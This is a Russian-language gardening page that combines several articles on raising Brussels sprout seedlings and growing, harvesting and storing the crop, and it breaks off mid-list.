1 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Посадка брюссельской капусты на рассаду

Посадка брюссельской капусты на рассаду

Посадка брюссельской капусты на рассаду проходит в несколько этапов. Сначала готовят и обрабатывают семена, почву, после чего происходит высадка в теплицу или открытый грунт.

Посадка брюссельской капусты на рассаду

Подготовка семян

Выращивание рассады брюссельской капусты из семян возможно как для теплицы, так и для открытого грунта. Для этого надо выбрать сорт и сажать его по специальным рекомендациям.

Выбор

Для достижения высокой урожайности, перед тем как проводить процедуру выращивания, следует приобрести качественные семена. Важно учитывать климатические и погодные условия региона.

Перед покупкой семян капусты, нужно выбрать сорт. Они бывают:

  • Раннеспелые. Урожай этого вида имеет срок созревания 4-4,5 месяца. К ним принадлежит сорт Франклин и Долмик.
  • Среднеспелые. Срок, к которому головки капусты созревают, — 5-6 месяцев. Популярные сорта — Диабло и Розетта.
  • Поздние. Плоды этого вида зреют в течение 6-7.5 месяцев. Гибрид Боксер относится к поздним сортам.

Рекомендуют садить разные сорта. Начинать сажать семена брюссельской капусты стоит в феврале.

Обработка

После покупки семена предварительно обрабатывают и проводят профилактические меры. Обработанные и протравленные от болезней семена всходят без лишних усилий. При высадке больших объемов капусты, подходят семена, обработанные перед посадкой. Процесс обработки занимает около 48 часов.

  • Поместить семена в воду температурой 50°C на 20 минут.
  • Вынув из воды, охладить под проточной водой в течение 1-2 минут.
  • После этого замочить в растворе Корневина или Эпина на 12 часов.
  • По истечении времени тщательно промыть.
  • Положить в прохладное место температурой 5-7°C на 24 часа.

После обработки семена нужно просушить, чтобы избавить от липкости. Проводить данную процедуру следует за 5-10 дней до посадки.

Уход за семенами

Семена рассады брюссельской капусты сеют в коробочки глубиной не меньше 7 см. Емкости под посадку обрабатывают горячей водой и содовым раствором. Высушенные сосуды заполняют почвенной смесью. За 2-3 дня почву увлажняют, а перед самим посевом дезинфицируют раствором марганцовки или препаратом Фитоспорин.

Расстояние между рядами должно составлять 4 см. Глубина бороздок — 1,5 см, их обязательно присыпают землей, а после — уплотняют дощечкой. Места посева увлажняют теплой водой методом дождевания и накрывают пленкой, что создает эффект парника.

Подготовка почвы

Аккуратно относимся к рассаде

Сажать семена нужно в заранее подготовленную землю. Есть несколько вариантов:

  • Посадочную смесь готовят в соотношении 1 части земли с огорода и 2 частей компоста.
  • Приготовить посевную смесь можно с 1 доли почвы, 1 доли песка и 3 частей перегноя. Ее предварительно обеззараживают пропариванием. После этой манипуляции недели 2 почва пребывает в состоянии восстановления микробиологических процессов. Перед посевом в грунт добавляют биогумус.
  • Можно использовать специальный грунт из магазина. Такие почвенные смеси имеют необходимую кислотность — грунт в них рыхлый и питательный.

Всходить рассада начинает через 3-5 дней при температуре 20°C. При появлении стебельков можно убрать пленку с емкости.

Пикировка

Пикировать сеянцы необходимо, когда появляются первые листочки. Их переносят в небольшие коробочки 6×6 см, заполненные посадочной почвой. Перед пересадкой проводят полив раствором марганцовки.

Корни при посадке не должны загибаться. Сеянцы усаживают к семядольным листикам. Пересадив в отдельные коробки, рассаду держат в течение дня, опрыскивая при этом водой.

Полив и подкормка

В процессе выращивания семян рассаду поливают по мере необходимости. Капуста любит поливы, но не переносит застоя воды. В чрезмерно увлажненной почве корни саженцев загнивают, а стебли поражаются болезнями и пропадают. При недостатке влаги ростки растут плохо.

Сеянцы, прошедшие пикировку, поливают по утрам, когда почва в коробках подсохнет. Полив производят теплой водой, т. к. от холодной воды ростки ослабевают и подвергаются болезням.

Подкармливать рассаду начинают, когда появляются 3 настоящих листка. Для подкормки используют 2 г Растворина на 1 л воды. При попадании вещества на листья его нужно немедленно смыть.

Вторая подкормка происходит за неделю до высадки растения в открытый грунт. На ведро воды берут:

  • 2 ч. л. мочевины;
  • 1-2 г сульфата калия;
  • 1 г медного купороса и борной кислоты, предварительно залитых горячей водой.

Последующие подкормки проводят в открытом грунте после появления завязи.

Закаливание

Приспосабливать рассаду к открытому воздуху начинают за неделю до высадки. Когда появляются всходы, температуру снижают до 6-8°C. Ростки оставляют на ночь на протяжении 7 дней и создают подсветку. Если нет возможности сделать дополнительное освещение, сеять рассаду стоит в конце февраля.

Подросшей рассаде нужен единый температурный режим: 14-18 °C на солнце, 12-16°C при пасмурной погоде и 9-10°C в ночное время.

При высоких температурах саженцы вытягиваются, а это значительно снижает их продуктивность.

Профилактика болезней

Основным заболеванием, которому подвержена рассада брюссельской капусты, является черная ножка.

Пораженные сеянцы сразу удаляют из рассадного ящика после чего подсушивают почву. Подсохший грунт поливают раствором марганцовокислого калия, а к стеблям подсыпают золу.

Профилактика помогает предотвратить появление черной ножки. Для этого не рекомендуют делать посевы слишком густыми и злоупотреблять частыми поливами.

Как выращивать рассаду капусты брюссельской своими руками?

В этой статье поговорим о том, как вырастить рассаду брюссельской капусты своими руками в домашних условиях. Как садить семена, выбирать почву, ухаживать за саженцами и высаживать их в грунт.

Как вырастить рассаду брюссельской капусты своими руками?

Выращивание брюссельской капусты довольно простое, самое главное правильно подобрать сорт и обеспечить оптимальные условия.

Стоит отметить, что всходят семена буквально за 2-3 дня, однако, развивается очень долго, в среднем, на протяжении 180 дней. Именно поэтому, чтобы вырастить хороший урожай, нужно выращивать ее при помощи рассады.

Брюссельская капуста характеризуется тем, что она необычная по своему внешнему виду и довольно полезная.

В этом овоще содержится очень много белка, а также других полезных веществ.

Сроки посадки семян брюссельской капусты

В холодных, северных регионах климат довольно сложный для выращивания капусты.

Это обусловлено вероятностью температурных перепадов, а также сложными климатическими условиями.

Слишком раннее высевание семян в открытый грунт нежелательно, так как большая часть растения погибнет.

Чтобы вырастить капусту в северных регионах, нужно высаживать в почву подросшую рассаду. Высадка производится в середине мая, а сама рассада должна быть примерно двухмесячного возраста.

Выращивание капусты в условиях средней полосы имеет свои определенные особенности. В таком случае, нужно выбирать только ранние или среднеранние сорта. Высевать для выращивания рассады нужно не позднее 25 апреля.

В регионах с мягким и теплым климатом высевать семена нужно начинать в середине марта.

Подготовка семян к посадке

Чтобы получить крепкое и здоровое растение, обязательно нужно правильно подготовить семена.

Для профилактики болезней нужно выдержать их в воде температурой 50 градусов на протяжении 20-30 минут, а затем очень быстро охладить под проточной водой.

Когда все будет готово, нужно обработать семена препаратом «Иммунофитоцит». Для этого развести 0,3-0,45 г препарата 10-15 мл воды. Приготовленным раствором обработать 5 г семян.

Лучше всего использовать качественные гибриды, так как они уже обеззаражены и защищены от различных грибковых инфекций.

Их можно высевать сразу же, без предварительной дезинфекции, прогревания и замачивания.

Грунт для рассады

Для высевания капусты обязательно нужно предварительно подготовить почву.

Для этого взять 1 часть обычной огородной земли и 2 части компоста.

Кроме того, хорошо подойдет такая смесь как:

  • 3 части перегноя;
  • 1 часть огородной земли;
  • 1 часть песка.

Готовую смесь перед высаживанием в нее семян нужно обеззаразить путем пропаривания или промораживания.

Оставить почвосмесь на 2 недели, чтобы полностью восстановились все требуемые процессы.

Дополнительно рекомендуется заселить ее почвенными микроорганизмами, применяя для этого Агровит или Байкал ЭМ-1.

Можно также высеять семена в уже подготовленную почву для рассады.

Он очень легкий, питательный, рыхлый, имеет требуемую кислотность, а также в нем не содержится микробов и сорняков.

Посадка семян в грунт

Семена нужно высевать в ящики, глубина которых составляет не менее 7 см.

Емкость предварительно нужно тщательно промыть, продезинфицировать и хорошо высушить.

Только лишь после предварительной подготовки в ящики насыпают подготовленный грунт.

За несколько дней до высадки семян землю нужно увлажнить, а также обработать раствором марганцовки. Для обеззараживания почвы можно также использовать препарат Фитоспорин.

Семена нужно высевать в бороздки на расстоянии и глубину 1-1,5 см. Расстояние между рядками должно составлять 3-4 см. После посева нужно слегка присыпать почвой.

После этого землю немного уплотнить, положив на нее дощечку, увлажнить при помощи пульверизатора теплой водой и прикрыть пленкой.

Поставить в теплое место и первые всходы должны появиться уже через 3-5 дней.

Сразу же после их появления пленку нужно снять и поставить емкость на подоконник, где много света.

Чтобы рассада сильно не вытягивалась, нужно использовать источники искусственного освещения, так как световой день для саженцев должен составлять 16-18 часов.

На протяжении недели первым росткам нужно понижать температуру до показателей 6-10 градусов.

Когда рассада немного подрастет, нужно чтобы температура была в пределах 16-18 градусов, так как при высоких температурных показателях рассада будет долго вытягиваться.

Особенно отрицательно сказывается высокая температура в сочетании с недостатком освещения.

Как часто поливать рассаду?

Капуста – влаголюбивое растение, однако, не стоит слишком сильно заливать рассаду водой.

Растет она хорошо, только если ее корни нормально дышат, так как эта культура просто не выносит застоя воды.

Если почва сильно увлажнена, то корни начинают загнивать, может произойти заражение черной ножкой и растение погибнет. Однако, недостаток влаги вызывает задержку роста.

Сеянцы поливают, когда земля в горшочках подсыхает.

Лучше всего это делать по утрам.

Вода, предназначенная для полива, не должна быть слишком холодной, так как если резко охлаждать почву, то активность корневой системы резко снижается.

Кроме того, рассада становится очень слабой, и она становится более восприимчивой к болезням.

За неделю до высадки, полив нужно прекратить. Когда появятся самые первые 2-3 листочка, нужно внести удобрение.

Освещение должно быть достаточно хорошим, чтобы сеянцы нормально росли, однако, обязательно нужно защищать их от прямых солнечных лучей.

Закаливание рассады

Примерно за 2 недели до пересаживания рассады в грунт, нужно постепенно снижать температуру до 5-6 градусов и повышать продолжительность и интенсивность освещения.

Это своего рода закаливание ростков для нормального их роста и развития.

Легче всего соблюдать все эти условия, если на время поставить рассаду на балкон.

Чтобы она не страдала от солнечных лучей, первое время ее нужно прикрывать пленкой.

Высадка рассады в открытый грунт

Рассаживать капусту нужно в почву только когда рассада будет высотой 10 см и делать это рекомендуется в самом начале мая.

Чтобы в результате получить довольно хороший урожай, высаживать сеянцы предпочтительнее на участки, где ранее не росли крестоцветные.

Участок обязательно должен быть достаточно хорошо освещенным и располагаться подальше от больших деревьев.

Если света будет мало, то растения начнут вытягиваться в высоту и при этом они становятся слабыми и уязвимыми к различным болезням.

В качестве профилактических мер против грибков не рекомендуется вносить азотные удобрения.

Стоит выращивать овощ на суглинистых, богатых почвах, в которые дополнительно вносится компост.

Если почва тяжелая или супесчаная, то кочанчики формируются слабые и больные.

Для полноценного роста овоща, температура его произрастания должна составлять примерно 15-18 градусов. Если же температура составляет 25 градусов и выше, то это несколько ухудшает качество плодов.

Высаживая на постоянное место произрастания рассаду, расстояние между отдельными рядами должно составлять 70 см, а между рядом расположенными растениями – 60 см.

В местностях с сильными и постоянными ветрами рекомендуется устанавливать прочные опоры, чтобы предотвратить повреждение и заваливание овоща.

Изначально рекомендуется снимать нижние кочанчики, чтобы обеспечить дальнейший полноценный рост и требуемое питание самых верхних плодов.

В выращивании брюссельской капусты нет ничего сложного, нужно только правильно подобрать самый подходящий сорт для своего региона и можно ранней весной приступать к высеванию семян.

Для получения хорошего урожая нужно обеспечить требуемые условия выращивания.

Надеемся теперь, зная, как вырастить рассаду брюссельской капусты , вы получите ее богатый урожай!

Как вырастить брюссельскую капусту из семян

Из всех овощей капустные имеют самую древнюю историю. Известно, что она пришла к нам из стран Средиземноморья. Древние греки и римляне окультурили дикорастущие листовые виды.

Сотни лет искусственного отбора и направленной селекционной работы обогатило рацион человечества разнообразными видами этой овощной культуры. Оказывается, капуста бывает

  1. кочанная (бело- и красно-),
  2. савойская,
  3. стеблевая (кольраби),
  4. листовая (пекинская),
  5. цветная,
  6. спаржевая (брокколи),
  7. брюссельская.

От остальных разновидностей брюссельская отличается самым высоким содержанием витамина С и витаминов группы В. О вкусовых и диетических качествах и говорить не приходится.

По сравнению с другими разновидностями, брюссельская капуста имеет самый продолжительный срок вегетации — 130-150 дней. Даже в условиях Средней полосы, эту овощную культуру можно выращивать только рассадным методом или в теплице.

[tip]По меньшей мере, нерационально, для культуры, которая с легкостью переносит заморозки до -7 о С, использовать небольшую площадь домашней теплицы. Проще и выгоднее использовать ее для:

  1. выращивание рассады
  2. доращивание выкопанных на зиму кустов.[/tip]

Вырастить брюссельскую капусту из семян в состоянии каждый дачник. Вовсе не обязательно загромождать городскую квартиру ящиками с землей и прочими атрибутами ваших огородных экспериментов.

Для начала, вычислим срок высадки капусты на рассаду. На упаковке семян производитель всегда указывает вегетационный период — время от появления первых всходов до уборки урожая.

Если трактовать в применении к брюссельской капусте — через такое количество дней после посадки семян вы первый раз срежете кочанчики этого деликатесного овоща.

Брюссельская капуста — с чего начать

Для начала определимся — методы, и подходы к выращиванию той же самой капусты в корне отличаются: в крупном агрохолдинге никогда не пользуются проверенными веками и поколениями приемами агротехники. Никогда городской житель, владелец дачи в пригороде, не будет уповать на панацею в виде коровьего навоза…

Существует масса практических рекомендаций и полезных советов по выращиванию овощей. Не всегда они адаптированы к реалиям — попробуем выделить те из них, которые не требуют особых навыков и условий…

Грунт для рассады

Можно воспользоваться любым вариантом покупной почвосмеси универсального назначения. Для придания сыпучей, рыхлой структуры его можно смешать с обычным песком в соотношении 4:1.

[tip]Для выращивания рассады лучше использовать не слишком питательные почвосмеси — так сеянцы лучше развивают корневую систему.[/tip]

Конечно, лучше приготовить грунтовую смесь самостоятельно. Это будет только на пользу вашей рассаде — растение с первых дней жизни приспособится к особенностям химического состава огородной земли.

Универсальную почву домашнего приготовления несложно приготовить, если смешать в равных долях

  1. торф,
  2. перегной или компост,
  3. землю с грядки,
  4. песок,
  5. зола (1 стакан на ведро смеси).

Когда сеем семена

Срок выращивания жизнеспособной рассады обычно составляет 50-55 дней практически для всех огородных культур. Сюда же добавляем примерно 1 неделю на появление всходов, и получаем суммарный результат — 2 месяца.

Чтобы в конце мая — начале июня высадить рассаду на грядку, семена следует посадить в конце марта.

Семена для домашнего выращивания брюссельской капусты лучше приобретать от проверенных производителей. Это не рекламный трюк, а многократный печальный опыт. Стоимость пакетика качественных семян ничто в сравнении с потерянным временем и обманутыми ожиданиями. О соответствии сортов говорить нет смысла…

Качественные семена уже прошли все возможные этапы предпосевной подготовки:

калибровку по размеру и весу зерен,

  1. стратификацию,
  2. обработку стимуляторами роста,
  3. грануляцию с органоминеральными удобрениями (цветная “глазурь”).

Никаких замачиваний и прочих “необходимых” операций с ними проводить нет надобности — можно сразу высаживать в почву.

Высаживаем семена

Существует 2 проверенных способа высаживания семян на рассаду:

  1. в рассадный ящик,
  2. в индивидуальные емкости.

Каждый имеет свои преимущества и недостатки.

В рассадный ящик

1 способом пользуются, когда

  1. рассады надо много,
  2. нет места для размещения стаканчиков-горшочков-пластиковых кассет.

К недостаткам этого метода относят, прежде всего, необходимость дальнейшего пикирования рассады. Эта операция не представляет сложности, но можно обойтись и без пикировки, если сразу высаживать семена в персональные емкости.

В кассетные емкости

Для домашнего выращивания (когда вам требуется не более 100 сеянцев) удобно использовать кассетные емкости для рассады. Это значительно упрощает уход за посевами:

  1. полив,
  2. подкормки,
  3. высаживание рассады на постоянное место.

Наличие в комплекте крышки-теплички позволяет поливать не так часто — всходы чувствуют себя намного лучше.

Как посадить семена брюссельской капусты на рассаду

Семена высаживаем во влажную почву на глубину около 1 см. Сразу накрываем мини-тепличкой и оставляем без присмотра на 4-5 дней при комнатной температуре 18-20 о С.

Не будет ошибкой оставить посеянную капусту всходить при температуре около 10 о С на даче или в неотапливаемой теплице — капуста растение холодостойкое и прорастать начинает уже при 6-7 о С. В таких условиях всходы появятся позже — дней через 10-12, но

  1. они будут намного крепче изнеженных в условиях “теплой” (с точки зрения капусты) городской квартиры;
  2. их не нужно будет закаливать;
  3. рассада точно не “вытянется”;
  4. при такой температуре нет необходимости в частых поливах.

Можно сделать вывод — без вашего участия за пару недель у вас будет капустная рассада хорошего качества.

Подкормки

Удобнее всего использовать “Кемиру” или “Мастер” — это водорастворимые удобрения сбалансированного состава (принципиального различия между этими торговыми марками нет). Для подкормки готовят раствор

Таким раствором подкармливают рассаду капусты за время выращивания 2 раза:

  1. в фазе 1-2 настоящих листов,
  2. за неделю до высадки в открытый грунт — в фазе 3-4 листьев.

При выращивании в кассетах — просто наливаете в поддон удобрение, в рассадном ящике — после подкормки обязательно необходим последующий полив.

Когда у сеянцев уже сформировано 3-4 настоящих листа — пора готовить капусту к жизни под открытым небом.

Закалка солнечным светом

После 2-й подкормки уже пора приучать рассаду к прямым солнечным лучам. Для начала поставьте ее на открытом воздухе на 25-20 минут. Постепенно увеличивайте продолжительность воздушных ванн — за неделю до высадки на грядку капуста должна “загорать” весь день.

Сажаем капусту на грядку

С этого момента начинается основной период жизни овощного растения с “пропиской” на огороде.

[warning]Перед высадкой на грядку рассаду в кассетах поливать нельзя. Если так уж хочется следовать “правильным советам”, полейте только часть. Во время высаживания рассады вы убедитесь на своем опыте, какой из методов удобнее.[/warning]

Грядка по плану

Для капусты (любой разновидности) очень важен севооборот — основные заболевания этой культуры передаются через почву. По этой же причине капусту не сажают после крестоцветных редиса, редьки.

Планировать отдельную грядку для брюссельской капусты вовсе не обязательно. Она отлично подходит на роль кулисной культуры для грядки огурцов. Нисколько не мешают друг другу капуста и картошка.

В двух ярусах растет рядами свекла и брюссельская капуста. Брюссельская капуста — довольно крупное растение, ее высота нередко превышает 100 см.

Вариантов множество. Главное помнить, что для 1 растения капусте необходима площадь 70х70 см. Удобнее всего высаживать брюссельскую капусту по меже между грядками, придерживаясь указанного расстоянием между растениями 70 см.

От чего зависит урожай

В литературе встречаются рекомендации делать прищипку верхушки над 10-12 парой листьев. Учитывая, что сосчитать листья не так просто, прищипните (отрежьте) верхушку на высоте примерно 70 см.

Эта прищипка — главный агротехнический прием, направленный на формирование урожая. Без этой несложной операции кочанчики в пазухах листьев так и останутся в зачаточном состоянии — вся сила питающих соков будет направлена на активный рост в высоту.

Сплошные преимущества

В отличие от других видов капусты, эта разновидность не столь требовательна к воде и органическим подкормкам, ей не требуется окучивание. Обработки химикатами от вредителей (тли и др.) с успехом можно заменить крепким раствором поваренной соли или отвара (настоя) горького перца, о безвредности которых говорить не надо..

Об уходе за созревающим урожаем в открытом грунте, выламывании листьев и прочем можно посмотреть в сюжете ЮТУБа.

При выращивании брюссельской капусты следует знать, что до морозов она не успеет сформировать весь урожай — верхние кочанчики не нальются.

Урожай — без потерь

Чтобы не потерять урожай практикуют (и не только в этом случае) доращивание капусты в теплице или погребе.

  1. Брюссельскую капусту выкапывают с комом земли.
  2. В теплице растения довольно плотно (не ломая листьев) укладывают и присыпают корни еще землей, торфом, что есть…
  3. Со временем органические составляющие стебля и листьев перетекут в кочанчики.

Срезать их можно по мере вызревания. Так они могут храниться очень долго. Главное, не хранить в срезанном виде — использовать или замораживать сразу.

Выращивание брюссельской капусты на огороде

В дикой природе брюссельская капуста не растет, она выведена искусственно в Бельгии. В нашей стране – этот кладезь витаминов узнали и полюбили в середине 19 века.

Выбор сорта брюссельской капусты

Брюссельскую двухлетнюю капусту невозможно спутать с другими видами капусты. Это растение высотой до 100 и более сантиметров с некрупными листьями на длинных стеблях. В пазухах лиственных черенков образуются кочанчики разных оттенков. На одном стебле завязывается их 30-70 шт. На второй год на растении вместо плодов появляются цветоносные побеги, которые вследствие перекрестного опыления образуют семена. Всхожесть данных семян сохраняется на протяжении 5 лет.

Большое разнообразие сортов радует любителей этого вида капусты.

Выбирая сорт для посадки на своем участке важно принять во внимание три свойства культуры:

  1. Созревание. Сорта капусты имеют разные сроки созревания: максимальный – более 170 суток, минимальный – 120.
  2. Урожайность. Возможно разное количество плодов. В среднем на одно растение приходится 50 головок, но некоторые дают до 70.
  3. Наличие полезных веществ. Селекционные современные разработки предлагают гибриды с большим содержанием белка, фолиевой кислоты, витаминов, минералов, каротина.

Различают брюссельскую капусту:

  • Сортовую – сорт имеет устойчивые признаки, которые передаются следующему поколению при размножении семенами. Им характерны крупные кочанчики с отличными вкусовыми качествами и длительным временем созревания.
  • Гибридную – ее выведенные признаки наилучше проявляются в первом поколении. Высота растения немного короче, а количество плодов больше они расположены по всей длине ствола. Созревают одновременно, сохраняют плотность 2-3 недели.

Брюссельская капуста имеет светлый оттенок листьев, но растения с высоким содержанием антоцианов окрашиваются в красные цвета.

Лучшими сортами считают:

Перфекшн

Российская среднепоздняя капуста с урожайностью 5 кг плодов в год с одного куста. Имеет отличные вкусовые и полезные качества. Пригодна для употребления в любом виде.

Завитка (Чехия)

Урожайный позднеспелый сорт. Плодоносить начинает на 160 день с протяженностью в 20 суток. Высота стебля достигает 90 см, кочанчиков вырастает много, но маленькие до 15 г.

Розелла (Германия)

Период созревания 170 дней. Растение вырастает до 90 см, плоды плотные зеленые с синим оттенком весом до 13 г. Основной особенностью сорта является дружное созревание плодов, пригодность к длительному хранению.

Руднеф

Сорт высокоурожайный. Высота стебля до 50 см с урожайностью 1 кг качанчиков по 20 г каждый. Выдерживает заморозки в -70 С. Пригоден для длительного хранения и приготовления разных блюд.

Геркулес (Россия)

Плодоношение начинается через 150 дней после всходов. Растет растение в высоту до 40-70 см с 12 граммовыми плодами овальной или круглой формы. Морозоустойчив. С хорошими вкусовыми качествами.

Выращивание рассады

Неприхотливая, морозостойкая капуста брюссельская имеет по сравнению со своими сородичами по виду самый длинный вегетативный период – это 120-180, а некоторые сорта и более 180 дней. Такая особенность влечет за собой необходимость выращивать ее, в основном, через рассаду.

Сроки посадки рассады

Время начала процесса выращивания напрямую зависит от температуры и выбранного сорта семян. Оптимальным сроком для раннесредних сортов – середина марта, среднепоздних – начало апреля.

Выращивать рассаду брюссельской капусты можно в обогреваемой теплице, застекленном балконе, подоконнике главное с соблюдением 70% влажности воздуха, хорошее освещение.

Подготовка семян к посадке

Особенно важным моментом в выращивании рассады является подготовка семян. Для этого:

  • семена держат во влажной ткани 5 дней;
  • подогревают в горячей воде (500 С) минут 20;
  • затем окунув в холодную воду, замачивают на 10 час. в растворе марганца;
  • промытые после марганцовки их помещают на сутки в холодильник;
  • по истечению суток семена, прошедшие процесс подготовки, подсушивают.

Подготовка семян к посеву повысит их всхожесть, избавит растение от заболеваний и вредителей, повысит устойчивость к холоду.

Посев семян на рассаду

Для посева семян готовят грунтовую смесь, состоящую из: торфа, дерновой земли, песка, древесной золы смешанных в равных пропорциях с добавкой минерального удобрения. Нежелательно использовать землю с огорода и перегной – есть опасность заражения черной ножкой.

Готовой почвой наполняют емкости, поливают раствором марганца и продавливают бороздки на глубину до 1,5 см с интервалом между рядами до 10 см. Семена раскладывают в бороздки на расстоянии

4 см друг от друга, засыпают почвой слегка, придавливая. Емкость накрывают стеклом или целлофаном для создания парникового эффекта.

Уход за рассадой

Посеянные семена в емкости держат в помещении с температурой до 200 С, почву при необходимости сбрызгивают водой. Первые всходы появятся уже через неделю.

В это время целесообразно понизить температуру и открыть растения, чтобы рассада не вытянулась.

С появлением первого настоящего листика на 9 день растение требует специального ухода он состоит из:

  1. пикировки – пересадке ростков на новое место. Для этого готовят отдельные стаканчики, горшочки или более просторные емкости заполняют свежей грунтовой смесью, поливают раствором марганца;
  2. рассаду вместе с комочком земли аккуратно пересаживают на новое подготовленное место, заглубляя ее по семядольные листочки;
  3. полива рассады теплой водой и рыхления земли;
  4. 2-х этапной подкормки. Первую (некорневую) нужно провести после развития 3 настоящих листьев. Раствор готовят из 10 л воды, суперфосфата (40 г), сернокислого калия (10г). Вторую проводят через 2 недели, для нее в 10 литрах воды растворяют суперфосфата (60 г), сернокислого калия (20г), аммиачной селитры (30 г). Удобрения вносят на политую почву;
  5. контроля влажности, чтобы не допустить перелива, который может привести к заболеванию черной ножки.

Закалка рассады

Перед тем как высадить брюссельскую капусту на грядку ее необходимо закалить. Для этого нужно обеспечить доступ к ней атмосферного воздуха. Если рассада выращивается в доме, то ее выносят на улицу. Процесс закаливания проводят на протяжении 15 дней, начиная с 0,5 часа с каждодневным увеличением времени до самой высадки на подготовленный участок.

Оптимальные сроки посадки в грунт

Рассада, имеющая толщину стебля

5 мм с минимум 5-ю листочками высотой до 20 см готова к пересадке в открытый грунт. Обычно – это последняя декада мая – середина июня.

За неделю до высадки рассады на грядку в открытый грунт прекратить ее полив. За день до высаживания растение обильно полить, чтобы создать как можно больший ком земли вокруг корней.

Подготовка почвы и схема высадки рассады брюссельской капусты

Правильно выбранное место для выращивания капусты – это залог отличного урожая. Он зависит от того какие культуры прорастали в прошлом сезоне на этой грядке. Если предшественниками были зерновые, бобовые, картофель, морковь, или лук – отлично. А от грядки, где росли свекла, томаты, редис желательно отказаться.

Повторное выращивание на одном участке самой же брюссельской капусты возможно не раньше 4 лет.

Брюссельская капуста хорошо растет на солнечных южных или юго-восточных участках. Любит суглинистую плодородную почву. Подготовку ее начинают осенью с глубокой (на глубину лопаты) перекопки. При необходимости вносят известь. Весной почву удобряют органикой с расчета на 1кв. м – 1 ведро, рыхлят на глубину до 5 см. Дополнительно в каждую лунку при высадке рассады вносят: 2 стакана золы древесной, 2 ст. ложки суперфосфата, 1 ч. л. мочевины.

В подготовленную почву рассаду высаживают в лунки, расположенные по схеме – 60х60 см. Размер выкопанной лунки должен быть больше размера корневой системы сеянца вместе с комом. В нее выкладывают удобрения, легонько смешивают с землей, затем способом переваливания перемещают росток рассады с рассадочной емкости в подготовленную лунку. Полив теплой водой засыпают слегка уплотнив.

Советы по правильному уходу

Урожай брюссельской капусты зависит от правильного ухода за ней.

Важнейшими мероприятиями являются: обработка междурядий – уничтожение сорняков, рыхление почвы, поддержание воздушно-водного режима. После полного формирования ствола нужно прищипнуть последнюю почку для улучшения стимуляции созревания плодов. Так как капуста брюссельская растет долго, а расстояние между саженцами довольно большое то допускается посадка между ними некоторых ранних культур: помидор, огурцов.

Полив и подкормка капусты

Растение влаголюбивое, требует регулярного полива. За время роста и плодоношения его поливают 10 и больше раз. При этом желательно делать полив глубоким, выливая до 8 л воды на 1 кв. м, а в период формирования плодов до 10-12 л. В дождливую погоду частота полива и количество расходуемой воды подлежит корректировке.Капусту поливают 3 способами: дождеванием, по бороздам и капельным.

Спустя 2 недели с момента посадки, начинается формирование розетки листьев, наступает время усиления азотного питания. Проводится первая подкормка Она зависит от того насколько хорошо были удобрены грядки осенью. Если выдержаны все нормы внесения органических удобрений, то первую подкормку можно ограничить внесением азотсодержащих смесей, после появления первых завязей провести подкормку калийной солью. Используют и органическое удобрение, разведенное в воде: коровяк 1:6, птичий помет 1:10, навозная жижа 1:4 с расчета до 1.5 л раствора на 1 растение.

К процессу подкормок нужно относиться осторожно – переизбыток удобрения может сказаться на качестве кочанов, они будут рыхлыми, недостаток азота проявится на зеленой массе – начнут желтеть и отпадать нижние листья.

Окучивание и рыхления почвы

Учитывая особенность строения брюссельской капусты – самые крупные головки формируются в пазушках нижних листьев, окучивание не проводят или проводят небольшим слоем. За время роста, развития и созревания растений проводится до 6 и больше рыхлений обязательно после полива или осадков.

Промедление рыхления задержит их рост. Первое – проводят на 3 день после посадки рассады. Главное не забывать мульчировать грядку.

Уход перед сбором урожая

За неделю перед предполагаемой уборкой урожая с растения снимают листья. Так с растений, которые созревают одновременно, их снимают одним разом, стараясь не нарушить целостность кочанчиков. А при постепенном созревании – в 2-3 приема, удаляют листья только с предполагаемого участка сбора урожая.

Сбор и хранение

Уборку урожая начинают после достижения плодов зрелости. Ее различают по максимальной величине, особенному блеску кочанчика, пожелтевшему листу у основания. Созревание раннесредних сортов приходиться сентябрь-октябрь, Сбор брюссельской капусты этих сортов проходит в 2-3 приема. Начиная снизу их, складывают в емкости и ставят в прохладное место. При температуре хранения 0 С они не теряют качества до 1,5 месяца, при заморозке всю зиму.

Среднепоздние сорта, которые созревают одновременно, готовы к одноразовой уборке в октябре-ноябре. При уборке такого вида возможна срубка стеблей у земли, складирования их в кучи с последующим отделением листьев и плодов.

Можно брюссельскую капусту сохранять в течении зимы в свежем состоянии и употреблять по надобности. Для этого растения выкапывают до первых заморозков и прикапывают песком в наклонном положении в подвале или теплице.

При отсутствии данных условий, можно хранить в холодильнике упаковав стебли с плодами в полиэтиленовые пакеты.

Болезни и вредители

Наиболее опасными по своему количеству и влиянию на капустные листы считаются: крестоцветная блошка, капустная и ростковая муха, капустная белянка.

Не менее опасны для брюссельской капусты и заболевания: гнили, черная ножка, пятнистости, мозаика, бактериоз, кила, бель.

Они способны частично, а иногда и полностью уничтожить урожай. Для его защиты проводят профилактические меры – это соблюдение правил ухода за данными растениями, высаживание по периметру культур, отпугивающих насекомые, применение народных средств.

В случае отсутствия результата необходимо воспользоваться для обработки фунгицидами.

Вырастить брюссельскую капусту несложно, главное соблюдать правила по выращиванию данной культуры. А она порадует вас плодами повышенной пищевой ценности и своим декоративным видом.

Брюссельская капуста: посев, выращивание и уход

Добавление статьи в новую подборку

Выращивание брюссельской капусты – процесс, доступный любому огороднику. Если вы уже освоили обращение с остальными крестоцветными, и, например, белокочанная капуста отлично растет у вас на участке, то и с ее «многодетной» родственницей проблем возникнуть не должно.

У этой необычайно полезной культуры, содержащей огромные запасы витамина С, белка и минералов, есть одна важная особенность – она крайне медлительна. От посева до уборки пройдет почти полгода, поэтому если вы хотите включить капусту в свой рацион уже летом, лучше выбирать кале, брокколи или цветную.

Как посеять брюссельскую капусту

Помня о том, что от посева до созревания у разных сортов брюссельской капусты проходит от 130 до 180 дней, и учитывая климат своего региона, нужно выбирать даты посева семян. Например, если вы живете в средней полосе и приобрели позднюю брюссельскую капусту, то заниматься рассадой нужно в начале апреля.

Брюссельская капуста любит прохладную погоду и не завязывает кочанчики в жару, поэтому подбирайте время посева так, чтобы период созревания пришелся на период со среднесуточной температурой не выше 18-20°C.

Подготовка семян к посеву

Для тех, кто собирается посадить несколько кустиков брюссельской капусты «на пробу», оптимальным вариантом станет покупка семян, прошедших промышленную подготовку. Обеззараженные, протравленные от болезней и паразитов, обработанные стимулятором роста семена стоят дороже, однако дадут хорошие всходы и не потребуют лишних усилий. А вот если вы высаживаете солидный объем рассады разом, то дешевле будет купить самые простые семена, а затем обработать их самостоятельно.

Для обработки потребуется:

  • на 20 минут погрузить семена в воду, нагретую до температуры 50°C;
  • после этого сразу охладить под проточной водой в течение 1-2 минут;
